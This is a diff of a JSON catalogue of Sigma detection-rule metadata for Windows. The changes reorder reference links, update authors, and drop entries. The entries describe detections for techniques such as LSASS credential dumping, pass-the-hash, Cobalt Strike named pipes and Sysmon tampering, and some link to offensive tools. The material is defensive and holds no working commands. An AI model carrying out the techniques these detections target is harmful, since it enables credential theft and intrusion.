"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml"
],
"tags": [
@@ -3752,8 +3752,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
+ "https://twitter.com/_xpn_/status/1491557187168178176",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml"
],
"tags": [
@@ -3787,9 +3787,9 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://github.com/codewhitesec/SysmonEnte/",
"https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html",
"https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png",
- "https://github.com/codewhitesec/SysmonEnte/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml"
],
"tags": [
@@ -3822,8 +3822,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/boku7/injectAmsiBypass",
"https://github.com/boku7/spawn",
+ "https://github.com/boku7/injectAmsiBypass",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml"
],
"tags": [
@@ -3865,8 +3865,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://twitter.com/SBousseaden/status/1541920424635912196",
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml"
],
@@ -3981,8 +3981,8 @@
"logsource.category": "sysmon_error",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml"
],
"tags": [
@@ -4015,8 +4015,8 @@
"logsource.category": "sysmon_status",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml"
],
"tags": [
@@ -4176,11 +4176,11 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
- "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
- "https://github.com/SigmaHQ/sigma/issues/253",
"https://twitter.com/d4rksystem/status/1357010969264873472",
+ "https://github.com/SigmaHQ/sigma/issues/253",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/",
+ "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml"
],
"tags": [
@@ -4249,8 +4249,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html",
+ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml"
],
"tags": [
@@ -4372,8 +4372,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html",
+ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml"
],
"tags": [
@@ -4406,8 +4406,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml"
],
"tags": [
@@ -4441,8 +4441,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://github.com/zcgonvh/EfsPotato",
"https://twitter.com/SBousseaden/status/1429530155291193354?s=20",
+ "https://github.com/zcgonvh/EfsPotato",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml"
],
"tags": [
@@ -4518,18 +4518,18 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
"https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
"https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://github.com/RiccardoAncarani/LiquidSnake",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
"https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://github.com/RiccardoAncarani/LiquidSnake",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml"
],
"tags": [
@@ -4563,8 +4563,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml"
],
"tags": [
@@ -4598,9 +4598,9 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://github.com/Azure/SimuLand",
- "https://o365blog.com/post/adfs/",
"https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
+ "https://o365blog.com/post/adfs/",
+ "https://github.com/Azure/SimuLand",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml"
],
"tags": [
@@ -4757,8 +4757,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)",
"https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml"
],
"tags": "No established tags"
@@ -4826,7 +4826,7 @@
{
"description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration",
"meta": {
- "author": "frack113, Nasreddine Bencherchali",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2023/01/17",
"falsepositive": "No established falsepositives",
"filename": "win_firewall_as_delete_all_rules.yml",
@@ -4845,7 +4845,7 @@
{
"description": "Detects activity when the settings of the Windows firewall have been changed",
"meta": {
- "author": "frack113",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2022/02/19",
"falsepositive": "No established falsepositives",
"filename": "win_firewall_as_setting_change.yml",
@@ -5038,8 +5038,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml"
],
"tags": [
@@ -5073,9 +5073,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
"https://twitter.com/MsftSecIntel/status/1257324139515269121",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml"
],
"tags": [
@@ -5108,8 +5108,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml"
],
"tags": [
@@ -5262,8 +5262,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml"
],
"tags": "No established tags"
@@ -5317,9 +5317,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml"
],
"tags": "No established tags"
@@ -5340,8 +5340,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml",
+ "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml"
],
"tags": [
@@ -5374,8 +5374,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml"
],
"tags": [
@@ -5485,29 +5485,6 @@
"uuid": "72124974-a68b-4366-b990-d30e0b2a190d",
"value": "Metasploit SMB Authentication"
},
- {
- "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_diagtrack_eop_default_login_username.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ]
- },
- "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196",
- "value": "DiagTrackEoP Default Login Username"
- },
{
"description": "This events that are generated when using the hacktool Ruler by Sensepost",
"meta": {
@@ -5521,10 +5498,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
- "https://github.com/sensepost/ruler",
"https://github.com/sensepost/ruler/issues/47",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
+ "https://github.com/sensepost/ruler",
"https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml"
],
@@ -5616,8 +5593,8 @@
"logsource.product": "windows",
"refs": [
"https://awakesecurity.com/blog/threat-hunting-for-paexec/",
- "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml"
],
"tags": [
@@ -5688,40 +5665,6 @@
"uuid": "32d56ea1-417f-44ff-822b-882873f5f43b",
"value": "Impacket PsExec Execution"
},
- {
- "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_apt_slingshot.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/apt-slingshot/84312/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.s0111"
- ]
- },
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7",
- "value": "Defrag Deactivation - Security"
- },
{
"description": "Detects remote service activity via remote access to the svcctl named pipe",
"meta": {
@@ -5811,9 +5754,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml"
],
"tags": "No established tags"
@@ -5853,41 +5796,6 @@
"uuid": "098d7118-55bc-4912-a836-dc6483a8d150",
"value": "Access to ADMIN$ Share"
},
- {
- "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
- "meta": {
- "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)",
- "creation_date": "2019/06/14",
- "falsepositive": [
- "Administrator activity"
- ],
- "filename": "win_security_pass_the_hash_2.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
- "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
- "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1550.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b",
- "value": "Pass the Hash Activity 2"
- },
{
"description": "Detects renaming of file while deletion with SDelete tool.",
"meta": {
@@ -5901,8 +5809,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
"https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete",
+ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm",
"https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml"
],
@@ -5949,27 +5857,6 @@
"uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d",
"value": "Secure Deletion with SDelete"
},
- {
- "description": "Detects logon events that specify new credentials",
- "meta": {
- "author": "Max Altgelt (Nextron Systems)",
- "creation_date": "2022/04/06",
- "falsepositive": [
- "Legitimate remote administration activity"
- ],
- "filename": "win_security_susp_logon_newcredentials.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b",
- "value": "Outgoing Logon with New Credentials"
- },
{
"description": "Detects certificate creation with template allowing risk permission subject",
"meta": {
@@ -6030,74 +5917,6 @@
"uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7",
"value": "Register new Logon Process by Rubeus"
},
- {
- "description": "Detects activity mentioned in Operation Wocao report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), frack113",
- "creation_date": "2019/12/20",
- "falsepositive": [
- "Administrators that use checkadmin.exe tool to enumerate local administrators"
- ],
- "filename": "win_security_apt_wocao.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
- "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012",
- "attack.defense_evasion",
- "attack.t1036.004",
- "attack.t1027",
- "attack.execution",
- "attack.t1053.005",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d",
- "value": "Operation Wocao Activity - Security"
- },
{
"description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.",
"meta": {
@@ -6111,8 +5930,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://twitter.com/_dirkjan/status/1309214379003588608",
+ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://dirkjanm.io/a-different-way-of-abusing-zerologon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml"
],
@@ -6238,9 +6057,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://threathunterplaybook.com/library/windows/active_directory_replication.html",
"https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html",
- "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml"
],
"tags": [
@@ -6358,35 +6177,6 @@
"uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a",
"value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security"
},
- {
- "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n",
- "meta": {
- "author": "Alexandr Yampolskyi, SOC Prime",
- "creation_date": "2019/03/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_group_modification_logging.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
- "https://www.cisecurity.org/controls/cis-controls-list/",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e",
- "value": "Group Modification Logging"
- },
{
"description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares",
"meta": {
@@ -6436,31 +6226,6 @@
"uuid": "910ab938-668b-401b-b08c-b596e80fdca5",
"value": "Transferring Files with Credential Data via Network Shares"
},
- {
- "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like",
- "meta": {
- "author": "@SBousseaden, Florian Roth",
- "creation_date": "2022/04/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_susp_krbrelayup.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
- "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access"
- ]
- },
- "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b",
- "value": "KrbRelayUp Attack Pattern"
- },
{
"description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986",
"meta": {
@@ -6508,8 +6273,8 @@
"logsource.product": "windows",
"refs": [
"https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
"https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
+ "https://github.com/fox-it/LDAPFragger",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml"
],
"tags": [
@@ -6650,9 +6415,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
"https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
"https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml"
],
"tags": [
@@ -6705,57 +6470,6 @@
"uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e",
"value": "DPAPI Domain Backup Key Extraction"
},
- {
- "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.",
- "meta": {
- "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
- "creation_date": "2023/01/19",
- "falsepositive": [
- "Legitimate or intentional inbound connections from public IP addresses on the SMB port."
- ],
- "filename": "win_security_successful_external_remote_smb_login.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
- "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_successful_external_remote_smb_login.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.credential_access",
- "attack.t1133",
- "attack.t1078",
- "attack.t1110"
- ]
- },
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
